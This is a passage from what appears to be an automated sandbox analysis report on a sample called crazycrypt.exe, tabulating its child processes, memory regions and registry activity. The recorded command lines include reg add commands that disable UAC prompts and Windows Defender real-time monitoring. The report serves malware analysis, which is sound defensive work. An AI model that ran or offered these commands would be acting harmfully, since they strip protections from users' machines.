| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #3: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9cc |
| Parent PID | 0x98c (c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9D0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00627fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x01bbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001bc0000 | 0x01bc0000 | 0x01f02fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f10000 | 0x021defff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab10000 | 0x4ab68fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef8dc0000 | 0x7fef8dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xa9c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4ab10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77740000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77756d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777523d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77748290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777517e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 113880 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #4: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9d4 |
| Parent PID | 0x98c (c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9D8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002d0000 | 0x00336fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00697fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00820fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x01c2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c30000 | 0x01c30000 | 0x01f72fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f80000 | 0x0224efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab10000 | 0x4ab68fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef8dc0000 | 0x7fef8dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xac4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4ab10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77740000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77756d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777523d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77748290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777517e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 113833 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #5: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9dc |
| Parent PID | 0x98c (c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9E0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x006f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c90000 | 0x01c90000 | 0x01fd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01fe0000 | 0x022aefff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab10000 | 0x4ab68fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef8dc0000 | 0x7fef8dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xaa4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
